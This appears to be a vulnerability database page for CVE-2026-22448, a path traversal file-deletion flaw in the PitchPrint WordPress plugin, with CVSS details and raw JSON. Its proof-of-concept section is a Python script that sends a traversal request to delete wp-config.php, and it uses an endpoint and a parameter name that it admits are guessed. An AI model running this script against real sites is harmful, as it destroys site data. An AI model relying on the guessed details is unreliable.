Security Vulnerability Report
中文
CVE-2026-22448 CVSS 7.5 HIGH

CVE-2026-22448

Published: 2026-03-25 17:16:31
Last Modified: 2026-04-28 19:36:38

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in flexcubed PitchPrint pitchprint allows Path Traversal.This issue affects PitchPrint: from n/a through <= 11.1.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

flexcubed PitchPrint <= 11.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for Path Traversal / Arbitrary File Deletion import requests def exploit(target_url): # Target endpoint (hypothetical based on common WP plugin structures) url = f"{target_url}/wp-content/plugins/pitchprint/ajax_endpoint.php" # Malicious payload attempting to delete wp-config.php # The parameter name 'file' is hypothetical payload = { "file": "../../../wp-config.php", "action": "delete" } try: response = requests.post(url, data=payload, timeout=5) if response.status_code == 200: print(f"[+] Request sent. Check if site is down or config missing.") else: print(f"[-] Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage # exploit("http://victim.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22448", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:30.507", "lastModified": "2026-04-28T19:36:38.117", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in flexcubed PitchPrint pitchprint allows Path Traversal.This issue affects PitchPrint: from n/a through <= 11.1.2."}, {"lang": "es", "value": "Limitación incorrecta de un nombre de ruta a un directorio restringido ('Salto de ruta') vulnerabilidad en flexcubed PitchPrint pitchprint permite Salto de ruta. Este problema afecta a PitchPrint: desde n/a hasta &lt;= 11.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pitchprint/vulnerability/wordpress-pitchprint-plugin-11-1-2-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}